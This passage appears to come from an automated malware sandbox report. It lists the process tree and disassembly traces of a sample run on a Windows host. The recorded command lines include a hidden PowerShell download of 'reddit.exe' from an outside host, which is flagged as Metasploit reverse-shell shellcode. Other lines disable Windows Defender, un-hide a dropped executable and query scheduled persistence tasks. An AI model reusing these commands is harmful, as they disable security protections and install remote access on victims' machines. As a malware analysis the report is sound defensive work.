                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:13:54:10
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:13:54:10
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:28
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:29
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:31
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:40
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:13:55:03
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:53
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:54
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:14.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:6.8%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph 7543 140001dea 7544 140001ded 7543->7544 7555 140012360 7544->7555 7547 140012360 HeapFree 7548 140001e11 7547->7548 7549 140012360 HeapFree 7548->7549 7550 140001e23 7549->7550 7551 140012360 HeapFree 7550->7551 7552 140001e35 7551->7552 7553 140012360 HeapFree 7552->7553 7554 140001e47 7553->7554 7556 140012371 HeapFree 7555->7556 7557 140001dfc 7555->7557 7556->7557 7557->7547 8328 140011f69 8329 14001202d 8328->8329 8330 140011f89 8328->8330 8330->8329 8331 140011fc4 8330->8331 8334 140011d30 4 API calls 8330->8334 8332 140011feb 8331->8332 8333 140011fcf memmove 8331->8333 8332->8329 8335 140011ffb 8332->8335 8336 14001202f memmove 8332->8336 8333->8332 8334->8331 8335->8329 8337 140016538 5 API calls 8335->8337 8336->8329 8337->8335 7558 1400141eb 7559 1400141f6 7558->7559 7561 14001430c 7559->7561 7562 140014d80 7559->7562 7563 140014dad 7562->7563 7564 140014e0a memmove 7563->7564 7565 140014def memmove 7563->7565 7566 140014dc7 7563->7566 7564->7566 7567 140014e2b memmove 7564->7567 7565->7566 7566->7561 7567->7566 8189 1400016ed 8190 1400016f0 8189->8190 8191 140012360 HeapFree 8190->8191 8192 1400016ff 8191->8192 8193 140011ef4 2 API calls 8192->8193 8194 140001711 8193->8194 8195 140011ef4 2 API calls 8194->8195 8196 140001723 8195->8196 7889 140003c6e 7890 140003c71 7889->7890 7891 140012360 HeapFree 7890->7891 7892 140003c80 7891->7892 7893 140012360 HeapFree 7892->7893 7894 140003c92 7893->7894 7895 140012360 HeapFree 7894->7895 7896 140003ca7 7895->7896 7897 140012360 HeapFree 7896->7897 7898 140003cb9 7897->7898 7899 140017070 7900 1400170f8 7899->7900 7901 140017097 MultiByteToWideChar 7899->7901 7902 1400126d0 2 API calls 7900->7902 7901->7900 7904 1400170c9 7901->7904 7905 140017101 7902->7905 7906 1400126d0 2 API calls 7904->7906 7907 1400170d2 MultiByteToWideChar 7906->7907 7907->7905 7908 140012c70 TlsGetValue HeapFree HeapFree 7909 140010c70 7912 140010c98 7909->7912 7913 140010cd1 7912->7913 7914 140010ceb 7912->7914 7917 140010cd9 7912->7917 7918 1400171f0 7913->7918 7914->7917 7925 140016e50 7914->7925 7931 140010f00 7917->7931 7919 140017216 WideCharToMultiByte 7918->7919 7920 14001729d malloc 7918->7920 7919->7920 7923 14001725a malloc 7919->7923 7921 1400172aa 7920->7921 7921->7917 7923->7920 7924 14001726d WideCharToMultiByte 7923->7924 7924->7921 7926 140016e76 WideCharToMultiByte 7925->7926 7929 140016f02 7925->7929 7928 140016ebe malloc 7926->7928 7926->7929 7928->7929 7930 140016ecf WideCharToMultiByte 7928->7930 7929->7917 7930->7929 7932 140010f1e 7931->7932 7933 1400126d0 2 API calls 7932->7933 7934 140010d5b 7933->7934 8197 140014af0 8199 140014b26 8197->8199 8200 140014b12 8197->8200 8198 140014d80 3 API calls 8198->8199 8200->8198 8200->8199 7397 14000e3f0 7398 14000e4ee 7397->7398 7399 14000e40a 7397->7399 7399->7398 7400 14000e483 7399->7400 7401 14000e41a 7399->7401 7414 14000e770 WideCharToMultiByte 7400->7414 7403 14000e451 7401->7403 7404 14000e425 7401->7404 7403->7403 7405 14000e45d WriteFile 7403->7405 7409 14000e620 5 API calls 7404->7409 7407 14000e4c5 WriteFile 7411 14000e4dc HeapFree 7407->7411 7408 14000e4b7 7418 14000e620 7408->7418 7412 14000e445 7409->7412 7411->7398 7413 14000e4bf 7413->7411 7415 14000e7b9 HeapAlloc 7414->7415 7416 14000e4a0 7414->7416 7415->7416 7417 14000e7d8 WideCharToMultiByte 7415->7417 7416->7398 7416->7407 7416->7408 7417->7416 7419 14000e644 7418->7419 7420 14000e75e 7418->7420 7421 14000e673 7419->7421 7422 14000e64a SetFilePointer 7419->7422 7420->7413 7423 14000e67e 7421->7423 7424 14000e6ff 7421->7424 7422->7421 7425 14000e6b7 7423->7425 7428 14000e699 memmove 7423->7428 7431 14000ddc0 7424->7431 7425->7413 7427 14000e707 7429 14000e711 WriteFile 7427->7429 7430 14000e739 memmove 7427->7430 7428->7413 7429->7413 7430->7413 7432 14000de04 7431->7432 7433 14000ddd4 WriteFile 7431->7433 7432->7427 7433->7427 7568 14000e1f0 7569 1400112a8 5 API calls 7568->7569 7570 14000e21b 7569->7570 7571 14000e227 CreateFileW 7570->7571 7572 14000e27f 7570->7572 7571->7572 7573 14000e25c 7571->7573 7573->7572 7574 14000e267 HeapAlloc 7573->7574 7574->7572 7579 1400113f8 EnterCriticalSection 7580 140011423 LeaveCriticalSection 7579->7580 7935 140016c77 7936 140016c89 TlsFree 7935->7936 7937 140016cbf 7935->7937 7939 140016c97 7936->7939 7938 140016cab DeleteCriticalSection 7938->7937 7939->7938 8201 14000d8f8 8202 14000d908 8201->8202 8203 14000d90d 8201->8203 8205 140011a50 8202->8205 8206 140011a81 8205->8206 8207 140011a60 8205->8207 8206->8203 8211 140011c48 EnterCriticalSection 8207->8211 8209 140011a65 8209->8206 8212 140011bdc 8209->8212 8211->8209 8213 140011be7 8212->8213 8214 140011c3c 8213->8214 8215 140011c32 LeaveCriticalSection 8213->8215 8214->8209 8215->8214 7393 140010ffc 7394 140011009 7393->7394 7395 14001101f 7393->7395 7394->7395 7396 140011013 TlsFree 7394->7396 7396->7395 8338 140010b7c 8339 140010b85 memset 8338->8339 8340 140010b8d 8338->8340 8339->8340 8341 14000477e 8342 140012360 HeapFree 8341->8342 8343 140004790 8342->8343 8344 140012360 HeapFree 8343->8344 8345 1400047a2 8344->8345 8346 140012360 HeapFree 8345->8346 8347 1400047b4 8346->8347 8348 140012360 HeapFree 8347->8348 8349 1400047c6 8348->8349 8350 140012360 HeapFree 8349->8350 8351 1400047d8 8350->8351 7434 140001000 7435 14000101d 7434->7435 7486 140012060 HeapCreate TlsAlloc 7435->7486 7437 14000105b 7489 14000de20 7437->7489 7439 140001065 7492 14000c980 HeapCreate 7439->7492 7441 140001074 7493 14000c07c 7441->7493 7443 140001079 7444 14000b538 memset InitCommonControlsEx CoInitialize 7443->7444 7445 14000107e 7444->7445 7446 140007160 InitializeCriticalSection 7445->7446 7447 140001083 7446->7447 7448 1400120d0 HeapAlloc HeapReAlloc HeapFree 7447->7448 7449 1400010a3 7448->7449 7450 14000ccd8 32 API calls 7449->7450 7451 1400010e6 7450->7451 7452 14000d524 16 API calls 7451->7452 7453 1400010fa 7452->7453 7454 14000d444 11 API calls 7453->7454 7455 14000111e 7454->7455 7456 14000d524 16 API calls 7455->7456 7457 14000112a 7456->7457 7458 14000d444 11 API calls 7457->7458 7459 14000114e 7458->7459 7460 140011d30 HeapAlloc memset HeapFree HeapFree 7459->7460 7461 140001185 7460->7461 7462 1400120d0 HeapAlloc HeapReAlloc HeapFree 7461->7462 7463 1400011a6 7462->7463 7464 14000d524 16 API calls 7463->7464 7465 1400011b2 7464->7465 7466 14000d444 11 API calls 7465->7466 7467 1400011d6 7466->7467 7468 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 7467->7468 7469 1400011e5 7468->7469 7470 1400121c0 GetLastError TlsGetValue SetLastError 7469->7470 7471 1400011ef 7470->7471 7472 1400121c0 GetLastError TlsGetValue SetLastError 7471->7472 7473 1400011ff 7472->7473 7474 140004211 31 API calls 7473->7474 7475 14000120e 7474->7475 7476 140012210 TlsGetValue HeapAlloc HeapReAlloc 7475->7476 7477 14000121f 7476->7477 7478 1400021ea 50 API calls 7477->7478 7479 140001224 7478->7479 7480 140001236 7479->7480 7481 14000433f 188 API calls 7479->7481 7482 14000593c 232 API calls 7480->7482 7481->7480 7483 14000123b 7482->7483 7484 1400120a0 HeapDestroy TlsFree 7483->7484 7485 140001245 HeapDestroy ExitProcess 7484->7485 7498 140012bf0 HeapAlloc HeapAlloc TlsSetValue 